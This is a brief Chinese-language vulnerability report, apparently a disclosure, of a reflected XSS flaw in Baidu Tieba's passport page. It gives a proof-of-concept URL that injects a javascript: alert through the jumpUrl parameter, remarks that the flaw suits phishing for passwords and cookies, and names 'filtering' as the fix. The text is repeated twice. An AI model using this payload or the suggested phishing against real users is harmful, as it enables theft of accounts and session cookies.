百度贴吧某处反射型XSS漏洞
http://tieba.baidu.com/f/user/passport?jumpUrl=javascript:alert(document.domain)
需要登录才可以触发,用来钓鱼片账号密码和cookie还是很不错的

修复方案:
过滤
百度贴吧某处反射型XSS漏洞
http://tieba.baidu.com/f/user/passport?jumpUrl=javascript:alert(document.domain)
需要登录才可以触发,用来钓鱼片账号密码和cookie还是很不错的

过滤